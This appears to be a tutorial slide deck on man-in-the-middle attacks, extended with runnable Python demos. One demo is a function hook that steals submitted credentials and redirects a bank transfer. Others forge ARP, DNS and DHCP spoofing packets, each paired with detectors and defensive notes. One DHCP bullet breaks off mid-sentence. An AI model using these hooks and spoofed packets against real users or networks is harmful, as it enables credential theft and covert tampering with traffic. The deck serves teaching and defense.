Man in the Middle
TALES OF TRUST AND BETRAYAL
Satria Ady Pradana, 2020
Hi!
I am Satria Ady Pradana
◎ Cyber Security Consultant at Mitra Integrasi Informatika
◎ Community Leader of Reversing.ID
◎ R&D Member of Indonesia Honeynet Project
◎ Researcher
xathrya
@xathrya
Reversing.ID
Revealing the Truth through Breaking Things
https://xathrya.id
Man in the Middle (MITM)
Also known as:
1. Bucket-brigade attack (the attacker passes each party's messages along, like buckets in a fire line).
2. Eavesdropping (strictly, only the passive form of the attack).
MITM: TALES OF TRUST AND BETRAYAL 3
Man in the Middle (MITM)
1. Eavesdropping.
2. Positioning oneself between two communicating parties.
3. Able to monitor, relay, and possibly alter the messages.
4. (Usually) tricking each party by impersonating the other side of the communication.
Uses, or acts as, a proxy in the middle.
Man in the Middle (MITM)
The name derives from a basketball scenario:
two players intend to pass a ball to each other while a player between
them tries to seize it.
Who Uses MITM?
1. Attackers, targeting people in their vicinity, to sniff or steal data.
2. Security researchers, targeting their own hardware or application, to learn its behavior.
Impact
In most cases:
1. Credentials are stolen.
2. Activity is monitored.
3. Messages are tampered with.
Techniques
MITM: Types
Based on Interaction
1. Passive
2. Active
Based on Level of Proximity
1. Application Level
2. Network Level
3. Hardware Level
Based on Attack
1. Rogue Access Point
2. Identity Spoofing
MITM: Passive
1. Quietly monitor messages.
2. Capture information in transit without modifying any part of it in any way.
3. Requires modifying the infrastructure (a tap or a mirror port), not the target.
Network Tapping
1. Introduce a middle point (a tap) on the communication line.
2. Copy the messages passing through.
3. Traffic does not transit through the attacker, and the attacker does not control the flow.
Port Mirroring
Also known as SPAN (Switched Port Analyzer).
A feature of most enterprise-class (managed) switches.
Forwards the inbound/outbound traffic of a specific port to another port.
MITM: Active
1. Periodically send (spoofed) requests or replies.
2. Modify application or machine behavior to redirect messages.
3. Force requests to transit through the attacker's proxy, unbeknownst to the parties.
Application-Level MITM
1. Application-to-application communication.
2. Inter-component communication.
3. Altering application behavior.
4. Hooking functions.
Example class:
1. Man in the Browser
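Added example, not code from the original slides: a Python stand-in for the "Man in the Browser" class of application-level MITM. Instead of hooking a browser's XMLHttpRequest, it hooks http.client.HTTPConnection.send, which sees every request as plaintext before it reaches the socket (and before TLS would protect it). The hook steals the submitted form fields and silently rewrites the transfer destination, patching Content-Length so the server still sees a well-formed request. FakeSocket, bank.example, the /transfer form and the account numbers are all constructed so the demo runs offline.

```python
# Added example (not from the original slides): application-level MITM by
# function hooking, in the spirit of Man in the Browser. Hooks the public
# HTTPConnection.send method; everything else is constructed for the demo.
import http.client
import re
from urllib.parse import parse_qs, urlencode

CAPTURED = []                       # fields the hook exfiltrated (kept in memory here)
ATTACKER_ACCOUNT = "999-MALLORY"    # constructed value for the demo
_original_send = http.client.HTTPConnection.send


def hooked_send(self, data):
    """Replacement for HTTPConnection.send: inspect and tamper, then pass on."""
    data = bytes(data)
    # http.client sends the header block and the body in separate calls.
    # Hold the headers of a request that carries a body so the rewritten
    # body length can be patched into Content-Length before anything is sent.
    if data.startswith((b"POST ", b"PUT ")) and b"Content-Length:" in data:
        self._mitb_headers = data
        return None
    headers = getattr(self, "_mitb_headers", b"")
    self._mitb_headers = b""
    if b"to_account=" in data:
        fields = parse_qs(data.decode(), keep_blank_values=True)
        CAPTURED.append({k: v[0] for k, v in fields.items()})   # credential theft
        fields["to_account"] = [ATTACKER_ACCOUNT]                 # transaction tampering
        data = urlencode(fields, doseq=True).encode()
        headers = re.sub(rb"Content-Length: \d+",
                         b"Content-Length: %d" % len(data), headers)
    return _original_send(self, headers + data)


def install_hook():
    http.client.HTTPConnection.send = hooked_send


def remove_hook():
    http.client.HTTPConnection.send = _original_send


class FakeSocket:
    """Stands in for the network so the demo runs offline; records bytes sent."""
    def __init__(self):
        self.sent = bytearray()

    def sendall(self, data):
        self.sent += data


def split_wire(wire):
    """Return (declared Content-Length, actual body length) of a raw request."""
    head, _, body = wire.partition(b"\r\n\r\n")
    declared = int(re.search(rb"Content-Length: (\d+)", head).group(1))
    return declared, len(body)


def run_demo():
    """The victim application submits a bank transfer; returns what reached the wire."""
    install_hook()
    try:
        conn = http.client.HTTPConnection("bank.example")
        conn.sock = FakeSocket()      # pre-attached, so no real connection is attempted
        body = urlencode({"user": "alice", "pass": "hunter2",
                          "to_account": "123-ALICE-SAVINGS", "amount": "100"})
        conn.request("POST", "/transfer", body=body,
                     headers={"Content-Type": "application/x-www-form-urlencoded"})
        return bytes(conn.sock.sent)
    finally:
        remove_hook()


if __name__ == "__main__":
    print(run_demo().decode())
    print("captured:", CAPTURED)
```

The point of the hook is that it runs inside the victim's own process: the attacker never has to be on the network path, and TLS does not help because the tampering happens before encryption. The same idea in a browser is a hooked XMLHttpRequest or fetch, or a hooked form-submit handler.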
Network Level MITM
Host-to-host communication.
Techniques:
1. Rogue Access Point
2. ARP Spoofing
3. DNS Spoofing
4. DHCP Spoofing
Rogue Access Point
1. Pretends to be a legitimate Access Point (e.g. by advertising the same SSID).
2. Tricks nearby devices into joining it.
ARP Spoofing
1. Address Resolution Protocol
   1. Maps an IP address to a physical (MAC) address.
   2. Switches forward by MAC address; routers forward by IP address.
2. Send forged ARP packets to modify the victim's ARP cache table.
   1. Usually the attacker poses as the gateway.
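Added example, not code from the original slides, and pure Python (struct only) so it runs without a network. build_arp() produces the exact Ethernet/ARP bytes an attacker sends to poison a cache, parse_arp() reads them back, and ArpWatcher is the defender's view: it learns IP-to-MAC bindings from the frames it sees and alerts when a binding changes, which is what a poisoned gateway entry looks like from a mirror port. All MAC and IP addresses are constructed for the demo.

```python
# Added example (not from the original slides): ARP spoofing packets and a
# binding-change detector. Addresses are constructed for the demo.
import struct

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac(s):
    return bytes.fromhex(s.replace(":", ""))


def ip(s):
    return bytes(int(o) for o in s.split("."))


def fmt_mac(b):
    return ":".join(f"{x:02x}" for x in b)


def fmt_ip(b):
    return ".".join(str(x) for x in b)


def build_arp(op, sender_mac, sender_ip, target_mac, target_ip, dst_mac=None):
    """Ethernet II frame carrying one ARP packet (14 + 28 bytes)."""
    eth = struct.pack("!6s6sH", mac(dst_mac or target_mac), mac(sender_mac), ETH_P_ARP)
    arp = struct.pack("!HHBBH6s4s6s4s",
                      1, 0x0800, 6, 4, op,          # Ethernet, IPv4, hlen, plen, opcode
                      mac(sender_mac), ip(sender_ip),
                      mac(target_mac), ip(target_ip))
    return eth + arp


def parse_arp(frame):
    """Return (op, sender_mac, sender_ip, target_mac, target_ip), or None if not ARP."""
    if len(frame) < 42:
        return None
    if struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    _, _, _, _, op, smac, sip, tmac, tip = struct.unpack("!HHBBH6s4s6s4s", frame[14:42])
    return op, fmt_mac(smac), fmt_ip(sip), fmt_mac(tmac), fmt_ip(tip)


class ArpWatcher:
    """Learns IP->MAC bindings from ARP traffic; alerts when a known binding changes."""
    def __init__(self, static=None):
        self.table = dict(static or {})   # pinned bindings, e.g. the real gateway
        self.alerts = []

    def observe(self, frame):
        parsed = parse_arp(frame)
        if parsed is None:
            return None
        op, smac, sip, _, _ = parsed
        known = self.table.get(sip)
        if known is None:
            self.table[sip] = smac        # first sighting: learn it
            return None
        if known != smac:
            kind = "reply" if op == ARP_REPLY else "request"
            alert = f"{sip} changed from {known} to {smac} (ARP {kind})"
            self.alerts.append(alert)
            return alert
        return None


def run_demo():
    gw_ip, gw_mac = "192.168.1.1", "aa:aa:aa:aa:aa:01"
    victim_ip, victim_mac = "192.168.1.10", "bb:bb:bb:bb:bb:10"
    attacker_mac = "cc:cc:cc:cc:cc:99"
    watcher = ArpWatcher(static={gw_ip: gw_mac})
    # Legitimate exchange: the victim resolves the gateway.
    request = build_arp(ARP_REQUEST, victim_mac, victim_ip, "00:00:00:00:00:00", gw_ip,
                        dst_mac=BROADCAST)
    reply = build_arp(ARP_REPLY, gw_mac, gw_ip, victim_mac, victim_ip)
    # Attack: unsolicited replies claiming the gateway's IP (sent to the victim) and
    # the victim's IP (sent to the gateway), so both directions flow via the attacker.
    poison_victim = build_arp(ARP_REPLY, attacker_mac, gw_ip, victim_mac, victim_ip)
    poison_gateway = build_arp(ARP_REPLY, attacker_mac, victim_ip, gw_mac, gw_ip)
    return [watcher.observe(f) for f in (request, reply, poison_victim, poison_gateway)]


if __name__ == "__main__":
    for result in run_demo():
        print(result)
```

Two practical notes. The attacker has to forward the intercepted traffic (IP forwarding on), otherwise the victim simply loses connectivity, which is itself a tell. On the defensive side the usual controls are a static (pinned) ARP entry for the gateway on sensitive hosts and Dynamic ARP Inspection on managed switches, which drops ARP replies that contradict the switch's DHCP-snooping binding table.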
DNS Spoofing
1. Domain Name System
   1. Converts a domain name to an IP address.
   2. Machines use IP addresses fluently; humans remember words better.
2. Send packets that corrupt or modify cached DNS information.
3. Usually by sniffing the transaction ID of a DNS request and replying before the real DNS server does.
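Added example, not code from the original slides, in pure Python (struct only) with no network access. A stub resolver accepts a reply only if its 16-bit transaction ID and question match an outstanding query, so an attacker who can sniff the query copies the ID and merely has to answer before the real server. build_query() and build_response() construct the wire-format messages, StubResolver is the victim's side, and it also flags the tell-tale sign of a won race: a second, different answer arriving for an ID it has already consumed. The domain name and addresses are constructed for the demo.

```python
# Added example (not from the original slides): the DNS transaction-ID race
# behind DNS spoofing, and a client-side conflict detector. Names and
# addresses are constructed for the demo.
import struct

TYPE_A, CLASS_IN = 1, 1


def encode_name(name):
    """Wire-format a domain name: length-prefixed labels, zero-terminated."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode()
    return out + b"\x00"


def decode_name(msg, off):
    """Decode a name at offset off, following RFC 1035 compression pointers."""
    labels = []
    while True:
        ln = msg[off]
        off += 1
        if ln == 0:
            break
        if ln & 0xC0 == 0xC0:                    # pointer to an earlier name
            ptr = ((ln & 0x3F) << 8) | msg[off]
            off += 1
            name, _ = decode_name(msg, ptr)
            labels.append(name)
            break
        labels.append(msg[off:off + ln].decode())
        off += ln
    return ".".join(labels), off


def build_query(txid, name):
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD=1, one question
    return header + encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)


def build_response(txid, name, ipv4, ttl=300):
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)   # QR=1 RD=1 RA=1, one answer
    question = encode_name(name) + struct.pack("!HH", TYPE_A, CLASS_IN)
    rr = b"\xc0\x0c" + struct.pack("!HHIH", TYPE_A, CLASS_IN, ttl, 4)  # name = pointer to offset 12
    return header + question + rr + bytes(int(o) for o in ipv4.split("."))


def parse_response(msg):
    """Return (txid, is_response, qname, [A-record addresses])."""
    txid, flags, _qd, an, _ns, _ar = struct.unpack("!HHHHHH", msg[:12])
    qname, off = decode_name(msg, 12)
    off += 4                                      # skip QTYPE, QCLASS
    answers = []
    for _ in range(an):
        _, off = decode_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", msg[off:off + 10])
        off += 10
        rdata, off = msg[off:off + rdlen], off + rdlen
        if rtype == TYPE_A and rdlen == 4:
            answers.append(".".join(str(b) for b in rdata))
    return txid, bool(flags & 0x8000), qname, answers


class StubResolver:
    """Victim side: first matching reply wins; later conflicting replies are flagged."""
    def __init__(self):
        self.pending, self.cache, self.alerts = {}, {}, []

    def send(self, name, txid):
        self.pending[txid] = name
        return build_query(txid, name)

    def receive(self, msg):
        txid, is_resp, qname, answers = parse_response(msg)
        if not is_resp:
            return "ignored"
        if self.pending.get(txid) == qname:       # ID and question match: accepted
            del self.pending[txid]
            self.cache[qname] = answers
            return "accepted"
        if qname in self.cache and self.cache[qname] != answers:
            self.alerts.append((txid, qname, answers))   # a second, different answer
            return "conflict"
        return "dropped"


def run_demo():
    r = StubResolver()
    query = r.send("bank.example", txid=0x1234)
    blind = build_response(0x9999, "bank.example", "203.0.113.66")        # guessed ID: fails
    sniffed_id = struct.unpack("!H", query[:2])[0]                          # read off the wire
    spoofed = build_response(sniffed_id, "bank.example", "203.0.113.66")   # arrives first
    real = build_response(0x1234, "bank.example", "198.51.100.10")          # arrives too late
    return [r.receive(m) for m in (blind, spoofed, real)], r.cache, r.alerts


if __name__ == "__main__":
    print(run_demo())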
DHCP Spoofing
1. Dynamic Host Configuration Protocol
   1. Sets up a host's IP address, gateway, DNS server, and subnet dynamically.
2. Hand the victim the attacker's desired configuration.
3. DHCP requests are broadcast.
4. Reply to the machine's DHCP request before the real DHCP server answers, controlling:
   1. the IP address of the victim;
   2. the gateway address assigned to
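Added example, not code from the original slides, in pure Python with no network access. build_dhcp() produces the BOOTP/DHCP payload that rides in UDP 67/68 for a DISCOVER or an OFFER; parse_dhcp() pulls out what matters to a MITM: the router (option 3), DNS server (option 6) and server identifier (option 54). RogueDhcpMonitor is the defender's view of the segment (from a mirror port or the real server's own capture): every OFFER/ACK that does not come from the allow-listed server, or that hands out a different gateway, is flagged. Addresses and the transaction ID are constructed for the demo.

```python
# Added example (not from the original slides): a rogue DHCP OFFER and a
# rogue-server detector. Addresses are constructed for the demo.
import struct

DHCP_MAGIC = b"\x63\x82\x53\x63"
DISCOVER, OFFER, REQUEST, ACK = 1, 2, 3, 5
OPT_SUBNET, OPT_ROUTER, OPT_DNS, OPT_MSG_TYPE, OPT_SERVER_ID, OPT_END = 1, 3, 6, 53, 54, 255


def ip(s):
    return bytes(int(o) for o in s.split("."))


def fmt_ip(b):
    return ".".join(str(x) for x in b)


def build_dhcp(msg_type, xid, client_mac, yiaddr="0.0.0.0", options=()):
    """236-byte fixed BOOTP header + magic cookie + options (RFC 2131/2132)."""
    op = 1 if msg_type in (DISCOVER, REQUEST) else 2       # BOOTREQUEST / BOOTREPLY
    chaddr = bytes.fromhex(client_mac.replace(":", "")).ljust(16, b"\x00")
    fixed = struct.pack("!BBBBIHH4s4s4s4s16s64s128s",
                        op, 1, 6, 0, xid, 0, 0x8000,       # htype=Ethernet, hlen=6, flags=broadcast
                        ip("0.0.0.0"), ip(yiaddr), ip("0.0.0.0"), ip("0.0.0.0"),
                        chaddr, b"", b"")                  # ciaddr yiaddr siaddr giaddr chaddr sname file
    opts = bytes([OPT_MSG_TYPE, 1, msg_type])
    for code, value in options:
        opts += bytes([code, len(value)]) + value
    return fixed + DHCP_MAGIC + opts + bytes([OPT_END])


def parse_dhcp(payload):
    """Return the fields a MITM cares about as a dict."""
    _op, _htype, hlen, _hops, xid, _secs, _flags = struct.unpack("!BBBBIHH", payload[:12])
    if payload[236:240] != DHCP_MAGIC:
        raise ValueError("not a DHCP message (magic cookie missing)")
    opts, i = {}, 240
    while i < len(payload):
        code = payload[i]
        if code == OPT_END:
            break
        if code == 0:                                      # pad option, no length byte
            i += 1
            continue
        length = payload[i + 1]
        opts[code] = payload[i + 2:i + 2 + length]
        i += 2 + length

    def addr(code):
        return fmt_ip(opts[code][:4]) if code in opts else None

    return {"xid": xid,
            "chaddr": ":".join(f"{b:02x}" for b in payload[28:28 + hlen]),
            "yiaddr": fmt_ip(payload[16:20]),
            "type": opts.get(OPT_MSG_TYPE, b"\x00")[0],
            "router": addr(OPT_ROUTER), "dns": addr(OPT_DNS), "server_id": addr(OPT_SERVER_ID)}


class RogueDhcpMonitor:
    """Flags server-side DHCP messages that do not come from the allow-listed server."""
    def __init__(self, allowed_servers, expected_router):
        self.allowed, self.router, self.alerts = set(allowed_servers), expected_router, []

    def observe(self, payload):
        p = parse_dhcp(payload)
        if p["type"] not in (OFFER, ACK):
            return None
        problems = []
        if p["server_id"] not in self.allowed:
            problems.append(f"unknown server {p['server_id']}")
        if p["router"] != self.router:
            problems.append(f"router {p['router']} != {self.router}")
        if not problems:
            return None
        alert = f"xid {p['xid']:#x} -> {p['chaddr']}: " + "; ".join(problems)
        self.alerts.append(alert)
        return alert


def run_demo():
    mon = RogueDhcpMonitor(allowed_servers={"192.168.1.1"}, expected_router="192.168.1.1")
    victim, xid = "bb:bb:bb:bb:bb:10", 0x3903F326
    discover = build_dhcp(DISCOVER, xid, victim)                  # broadcast by the victim
    rogue = build_dhcp(OFFER, xid, victim, "192.168.1.10", [       # attacker answers first,
        (OPT_SERVER_ID, ip("192.168.1.99")), (OPT_ROUTER, ip("192.168.1.99")),   # naming itself
        (OPT_DNS, ip("192.168.1.99")), (OPT_SUBNET, ip("255.255.255.0"))])       # gateway and DNS
    real = build_dhcp(OFFER, xid, victim, "192.168.1.50", [
        (OPT_SERVER_ID, ip("192.168.1.1")), (OPT_ROUTER, ip("192.168.1.1")),
        (OPT_DNS, ip("192.168.1.1")), (OPT_SUBNET, ip("255.255.255.0"))])
    return [mon.observe(m) for m in (discover, rogue, real)]


if __name__ == "__main__":
    for result in run_demo():
        print(result)
```

A client normally takes the first OFFER it receives, which is why the rogue only has to be faster than the real server. The switch-side control is DHCP snooping: server-side messages (OFFER/ACK) are accepted only on ports marked trusted, and the resulting binding table is what Dynamic ARP Inspection later checks ARP replies against.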
Hardware-Level MITM
1. Targets contactless devices (proximity cards, RFID, NFC, etc.).
2. Commonly used to relay and replay messages.
